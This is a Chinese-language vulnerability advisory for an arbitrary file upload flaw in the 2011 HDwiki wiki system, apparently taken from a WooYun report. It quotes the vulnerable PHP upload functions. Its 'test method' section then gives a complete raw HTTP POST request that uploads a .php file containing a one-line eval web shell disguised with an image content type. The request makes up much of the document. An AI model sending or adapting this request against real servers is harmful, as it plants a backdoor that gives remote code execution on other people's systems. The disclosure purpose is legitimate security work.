HDwiki文件上传导致远程代码执行漏洞

漏洞版本:

HDwiki（2011）

漏洞描述:

互动维客开源系统（HDwiki）作为中国第一家拥有自主知识产权的中文维基（Wiki）系统，由互动在线（北京）科技有限公司于2006 年11月28日正式推出，力争为给国内外众多的维基（Wiki）爱好者提供一个免费、易用、功能强大的维基（Wiki）建站系统

lib/file.class.php中

1. function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){
2.  
3. $result=array ('result'=>false,'msg'=>'upload mistake');
4.  
5. if($is_image){
6.  
7. $attach=$attachment;
8.  
9. $filesize=$attach['size']/1024;
10.  
11. if(0==$filesize){
12.  
13. $result['msg']='上传错误';
14.  
15. return $result;
16.  
17. }
18.  
19. if(substr($attach['type'],0,6)!='image/'){
20.  
21. $result['msg']='格式错误';
22.  
23. return $result;
24.  
25. }
26.  
27. if($filesize>$maxsize){
28.  
29. $result['msg']='文件过大';
30.  
31. return $result;
32.  
33. }
34.  
35. }else{
36.  
37. $attach['tmp_name']=$attachment;
38.  
39. }
40.  
41. $filedir=dirname($target);
42.  
43. file::forcemkdir($filedir);
44.  
45. if(@copy($attach['tmp_name'],$target)||@move_uploaded_file($attach['tmp_name'],$target)){

没有什么检查 attachment.php里触发

1. function douploadimg(){
2.  
3. $imgname=$_FILES['photofile']['name'];
4.  
5. $extname=file::extname($imgname);
6.  
7. $destfile=$_ENV['attachment']->makepath($extname);
8.  
9. $arrupload=file::uploadfile($_FILES['photofile'],$destfile);
10.  

<* 参考

http://www.wooyun.org/bugs/wooyun-2010-02706

*>

测试方法:

POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1

 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,*/*

 

Referer: http://www.wooyun.org/

 

Accept-Language: zh-cn

 

Content-Type: multipart/form-data; boundary=---------------------------7db261e100f2e

 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)

 

Host: www.wooyun.org

 

Content-Length: 370

 

Connection: Keep-Alive

 

Cache-Control: no-cache

 

Cookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373

 

 

 

-----------------------------7db261e100f2e

 

Content-Disposition: form-data; name="MAX_FILE_SIZE"

 

 

 

30000

 

-----------------------------7db261e100f2e

 

Content-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php"

 

Content-Type: image/image

 

 

 

zzz<?eval($_REQUEST[z])?>

 

-----------------------------7db261e100f2e--

安全建议:

厂商解决方案

目前没有详细解决方案提供：
http://kaiyuan.hudong.com/